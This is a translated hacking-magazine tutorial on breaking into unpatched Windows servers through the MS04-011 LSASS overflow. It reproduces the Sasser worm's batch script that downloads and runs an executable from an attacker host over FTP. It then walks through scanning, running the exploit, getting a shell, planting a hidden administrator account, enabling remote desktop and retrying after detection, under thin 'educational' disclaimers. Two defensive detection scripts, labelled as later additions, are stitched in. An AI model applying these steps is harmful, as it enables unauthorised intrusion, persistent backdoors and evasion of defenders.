Lsasrv.dll RPC Buffer Overflow Remote Exploit: Black-Devils B0ys Digital Network Security Group
www.WebSecurityMgz.com
The LSASRV.dll Hole and How Windows Servers Are Broken Into Through It
Notes:
It must be pointed out that everything said in this article is purely educational. Any non-educational use of this material is the users' own responsibility, and neither the authors of this article nor the management of the Web Security site accept any responsibility for it.
Introduction:
This is not a science-fiction story.
I think it was the morning of a day in mid-May. As on any other day, I was finishing my daily report as network security manager. I even remember the time of the incident well: 10:15. It stuck with me partly because, to keep the servers up, we were forced to take some of them off the network manually at the switch. I actually noticed the incident when, on the very system I was writing my daily report on, a message appeared saying that the system would shut down within 60 seconds and that I should save my data immediately. I still did not know what had happened, but so that at least the effort I had put into that long 3-page report would not be wasted, instead of panicking I told myself: whatever caused this message, it looks like a shutdown issued from the command line, and that can be cancelled with another command. So I went to Run and, with the command Shutdown /a, temporarily stopped the system from shutting down.
But I knew this was no real fix; the problem was bigger than that, and something else had to be behind it. Things became clearer and more serious for me when the support department called to say that most of the users on our network had the same problem and did not know what to do. I should add that at that point I did not know what was causing it either. Also, because several servers had been taken down, the load on the remaining servers had risen and the network had become very slow. At first I thought we were facing a Distributed Denial of Service (DDoS) attack; later I found out that all this trouble was caused by a new worm.
Yes, friends, you guessed right: the Sasser worm. You have surely wrestled with this 15-kilobyte friend as well. My friends and I do not intend to describe the full structure and workings of the variants of this Internet worm in this article; I will only touch on it briefly. In those days it was announced that the worm used a vulnerability in the Lsass.exe process to break into and spread across networks. When I heard this news of a hole in that component, I remembered a security advisory from the experts of the eEye security group. They had announced that the vulnerability lay in lsasrv.dll, which is used by lsass.exe, and that by overflowing a buffer in it an attacker could compromise the security of the system. In this case too, soon after eEye's warning, Microsoft released patches for that hole. From all this I concluded that these young German hackers (the NetSky group) must have used this new hole to spread the Sasser worm, but the story did not end there. With the experience of these years, I told myself: behind every worm there is a hole, and behind every hole there is an exploit for breaking in. Since hackers get the most out of every new hole, and since this worm was not yet a year old and only 3-4 months had passed since the incident, this vulnerability was bound to be the way into networks for the coming months.
The vulnerability has become known as the lsass hole. Systems not patched with Microsoft KB835732, described in Microsoft Security Bulletin MS04-011, are open to it: Windows NT, Windows XP (SP0-SP1), Windows 2000 (SP1-SP4) and Windows Server 2003 in both the 32- and 64-bit editions. You can, of course, prevent any attack on your systems through this hole by installing the patches released for it or by upgrading the operating system to Service Pack 2.
To begin with, I want to familiarize you a little with how this worm works, so that you can easily understand how the exploit works. As you may already know, after breaking into your system the worm displays a message that the system will shut down within 60 seconds.
The worm is often confused with the well-known MS Blaster / Lovesan worm, but this very message makes it easy to tell them apart. Interestingly, variants of this worm have been identified whose source code differs little from Sasser but which look different and also differ in how they spread and behave inside the system. One such worm, for example, was written by a person using the alias Cyclone, who also claimed to be Iranian and a member of the community of Iranian hacker-programmers that holds a political position in Iran. This worm enters the system through port TCP/445 and, if the system is vulnerable, downloads a copy of itself named CYCLONE.EXE into the system root. The worm can only attack when the TFTP.EXE utility is present on the target; it then begins its attack and the Lsass.exe process, which
Removal of this worm is only possible in safe mode, and removing this new worm takes some work, because it knocks out system commands such as msconfig, disables firewalls and stops antivirus products such as Norton from working, all of which makes removal hard. Like the experts of the Security Focus security team, I believe the only way to get rid of this worm is to reinstall Windows and patch the relevant holes. Moreover, no antivirus product is able to remove this new kind of worm. If you have not yet been infected, do not lose time: protect yourself from these worms by disabling this vulnerability in lsasrv.dll and the lsass.exe process.
and, using the general form of the commands below, identifies the IP addresses of further targets and starts spreading itself across the network. Using an FTP server on port TCP/5554, the worm checks whether the IP addresses it has collected through the Windows API are online, and whenever one of them is vulnerable it connects to that vulnerable system through ports TCP/5554 and TCP/9994 and spreads itself.
echo off
echo open [attacking machine address] 5554>>cmd.ftp
echo anonymous>>cmd.ftp
echo user
echo bin>>cmd.ftp
echo get [random number]_up.exe>>cmd.ftp
echo bye>>cmd.ftp
echo on
ftp -s:cmd.ftp
[random number]_up.exe
echo off
del cmd.ftp
echo on
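A defender's view of the propagation pattern just described, added here as an example and not part of the original article: the script below flags hosts that fan out to many addresses on TCP/445 (the SMB port the LSASS exploit arrives on) and that also appear on the worm's transfer ports as listed above (5554 and 9994). The log format and every sample line are constructed for this example.

```python
from collections import defaultdict

# TCP/445 carries the SMB/RPC traffic the LSASS exploit arrives on; 5554 and
# 9994 are the worm's transfer ports as listed in the article above.
LSASS_PORT = 445
WORM_PORTS = {5554, 9994}

# Constructed sample log, one accepted connection per line: "src dst dport".
SAMPLE_LOG = """\
192.168.1.20 192.168.1.1 445
192.168.1.20 192.168.1.2 445
192.168.1.20 192.168.1.3 445
192.168.1.20 192.168.1.4 445
192.168.1.20 192.168.1.5 445
192.168.1.5 192.168.1.20 5554
192.168.1.30 192.168.1.10 445
192.168.1.30 192.168.1.10 139
192.168.1.40 192.168.1.50 80
"""

def parse_log(text):
    """Parse 'src dst dport' lines into tuples; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3 or not parts[2].isdigit():
            continue
        events.append((parts[0], parts[1], int(parts[2])))
    return events

def find_infected(events, min_targets=5):
    """Return {host: (distinct 445 targets, sorted worm ports seen)} for hosts
    that probe at least min_targets addresses on 445 and are also an endpoint
    of worm-port traffic (serving the FTP copy, or reaching a victim's shell)."""
    targets = defaultdict(set)
    worm_ports = defaultdict(set)
    for src, dst, dport in events:
        if dport == LSASS_PORT:
            targets[src].add(dst)
        elif dport in WORM_PORTS:
            worm_ports[src].add(dport)
            worm_ports[dst].add(dport)
    return {host: (len(seen), sorted(worm_ports[host]))
            for host, seen in targets.items()
            if len(seen) >= min_targets and worm_ports[host]}

if __name__ == "__main__":
    for host, (count, ports) in find_infected(parse_log(SAMPLE_LOG)).items():
        print(f"{host}: probed {count} hosts on 445, worm ports {ports}")
```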
It should be explained that the early variants of Sasser were unable to attack this series of IP addresses:
• 127.0.0.1
• 10.x.x.x
• 192.168.x.x
• 169.254.x.x
It is still not clear why: technical problems, or a decision by the worm's authors to skip these addresses! In any case, the Sasser NG versions described above attack every vulnerable IP address.
It is worth noting that Sasser went through versions A to Z. After the author's arrest, other people began releasing further variants of the worm; although these later worms used the same hole to break in and shared a similar code genome, particularly with Worm.Win32.Sasser.B, they differed markedly from their fathers in the range of their attacks, their other capabilities and their stealth.
The article below is a step-by-step description of how the unpatched systems mentioned above are broken into. Because this hole is new, and because network administrators are perpetually lax about updating their systems, the volume of attacks using it is likely to be very high. For that reason we decided to warn of the danger of this kind of attack by introducing the hole, explaining how it works and showing how to detect it on vulnerable servers. The material in this article is therefore purely educational; any misuse of it is the users' own responsibility, and neither the authors of this article nor the management of the Web Security site accept any responsibility in this regard.
2: nc11nt
http://www.atstake.com
Note: all operations were performed on hypothetical systems and were prepared purely to demonstrate the procedure; the IP addresses belong to a private LAN.
First determine your own IP address on the network with the Ipconfig command, then use nmap with the -sP switch to find the systems that are up (to keep this article short, you can refer for this part to the article "The RPC Hole and Breaking Into IIS Servers" on the Web Security site). After finding the systems of interest you must check them for the bug in question. If you have only one target in mind you can skip this step, since testing the exploit directly against it will tell you whether the hole is present; but if you intend to check an IP range for vulnerable systems, testing each one with the exploit can be tedious. For that purpose you can use GFI LANguard Security Scanner v5. It is a very powerful scanner that not only checks this particular hole for you in the shortest time but also finds every hole known to date, and you will certainly identify many other holes as well. Working with this scanner, however, requires some prior familiarity with how
So I recommend to you the tool that Foundstone has prepared for this specific purpose. Working with this scanner is far, far simpler than with GFI, but for professionals I still recommend GFI (do take this recommendation seriously).
See the figure below (the DDSScan tool from Foundstone).
To start working with this scanner, first enter the scan range in the Start IP and End IP fields, then click the arrow next to them to select the range and start the scan. Results appear quickly. In the Status column you can see which systems are vulnerable and which are not. By entering a single IP or host name in the upper part of this section you can also test just one target for this bug.
Note: the IP addresses shown in the figures below belong to an internal network and were tested purely for instruction inside a virtual network; they are of no use outside that network.
2: In this step we inject the exploit at the target server (you can compile the source of this exploit with Lcc-Win32).
Note: to spare my hands the long name HOD-ms04011-lsasrv-expl.exe, I renamed this exploit to lss.exe; I suggest you do the same before running it.
Once the exploit has connected to the target successfully and you see the message Attacking … OK, you must get to the shell account in one of the two ways below.
You can also use other ports, but bear in mind that if you choose well-known ports such as 80 or 23, or ports that standard protocols use, this may interfere with the exploit and you will fail; so it is better to use unusual ports such as 6669 or 44444, or any other port of your choice.
In the figure below you can see that port 5000 has been put into listening mode; when the exploit's reply comes back, the shell on your system uses this port to communicate with the target.
b: The second way, the one I recommend myself, is to use Telnet, because Telnet is faster than Netcat in this particular case. On the other hand, as far as the security of establishing the connection goes, the very very verbose (VVV) mode is available in netcat. Which of the two you choose is up to you.
3: In the figure below I took the shell through the Telnet program and, with the ipconfig command, confirmed that I now have the IP address 217.218.13.173; in effect I have become one of this system's users, with administrator rights. I suggest you send an e-mail to the administrator of the server concerned to let them know about this bug.
4: From here on the system is in your hands, and in practical terms you can now do anything, although ethically there are limits. Here you could exchange files with the target over TFTP, sniff data, or do anything else on the server. In what follows, however, and only to familiarize users, I will show you just one of the things you can do on the target system: creating a new user on it, so that next time you do not need to run the exploit again to get into the server. You can also create a backdoor on the target with netcat. I repeat: at this stage of the intrusion everything depends on you, and it is you who decides how far to extend your intrusion on the target. In the figure below, the net user command shows the system's accounts. You could change the password of one of these accounts, but I will not change the password of the main user, which here is Administrator. If there is a user name that has not been used for a long time, that is a suitable one to change.
But I intend to create a user with administrator access named sysbackup (see the figure below). Again, if there was a user that had not been used for a while, you could work with that one instead.
Running the net user command again, you can see that sysbackup has been added to the system's users.
To see the details of the user we created we use the command net user sysbackup. Look at the Local Group Memberships section: you will notice this user is not yet an administrator!
With the command you see in the figure below I turn sysbackup into an administrator.
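The defensive counterpart to the account changes described above, added here as an example and not part of the original article: compare two snapshots of the text that net localgroup Administrators prints and report members that were not in the baseline. Both snapshots are constructed sample output in that command's layout.

```python
import re

# Constructed snapshots in the layout printed by "net localgroup Administrators":
# header lines, a dashed separator, one or more member columns, a status line.
BASELINE = """\
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.
"""

CURRENT = """\
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator            sysbackup
The command completed successfully.
"""

def parse_members(text):
    """Return the member names between the dashed separator and the status
    line. Columns are separated by runs of two or more spaces, so a name that
    contains a single space (e.g. a domain group) survives the split."""
    members, in_list = [], False
    for line in text.splitlines():
        if line.startswith("----"):
            in_list = True
        elif line.startswith("The command completed"):
            break
        elif in_list and line.strip():
            members.extend(re.split(r" {2,}", line.strip()))
    return members

def added_admins(baseline_text, current_text):
    """Names in the current Administrators group that the baseline lacked
    (compared case-insensitively, as Windows account names are)."""
    known = {m.lower() for m in parse_members(baseline_text)}
    return [m for m in parse_members(current_text) if m.lower() not in known]

if __name__ == "__main__":
    for name in added_admins(BASELINE, CURRENT):
        print(f"new local administrator since baseline: {name}")
```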
I also set a password on this user, to prevent any misuse: 12345.
With the net start command, look at the services running on the system. If you see Terminal Services, you can later use Remote Desktop Connection or other programs such as Terminal Server & Client to get in; you can get the program from Download.com.
(Viewing the list of services currently running on the target system, in particular Terminal Services.)
If for any reason the Terminal Services service is not started, you can start it as administrator so that next time you will be able to connect to the server through Remote Desktop Connection (to start services, see the subcommands of the Net command). You can of course also use other programs such as Terminal Server & Client and WinVNC32 to connect to the server, but here, for users' convenience, I use one of Windows' own built-in programs.
In the figure below we use the user name and password you learned how to create in the steps above. This is not the only way to get back into a hacked system, but since this method is user friendly I used it as the example. As I said above, you can also create a backdoor on the system and get back into it without running the exploit again.
This is what you were hoping to obtain, and I am sure you will not do any damage and, like all white-hat hackers, at this stage you will inform the site's administrator of this particular bug and show them how to patch the vulnerability.
Important note:
It is also possible that even with the user and password you cannot connect to the target system, because the server must be restarted for your newly created account to be taken up by the system's security process so that it can be used next time. For this, use the Windows Remote Shutdown Dialog, then use Remote Desktop Connection again to connect.
Restart. You must, of course, accept the risk of your intrusion being exposed. In any case, if at this stage you still cannot log in even after restarting the target system, it is likely that your attack has been detected and your new account disabled or deleted.... Try to get in again through the same exploit, but this time with more caution.
Although breaking into a system is no easy job, extending the intrusion and staying hidden is more complex still; the real art of hacking crystallizes at exactly this point.....
Final word: what matters is not how you get into your target but how you extend your intrusion and what goals you pursue with it. We ask you to use this article to secure your own servers and to warn others, and if you discover such a bug in your own system, to install the patches referred to. Below we provide the source of this exploit for users who are proficient in C programming.
If you run into any problems, please contact the authors of this article; all mail will be answered as soon as possible.
Mohsen2_ir@yahoo.com
Liv4devil@yahoo.com C0llect0r@Spymac.com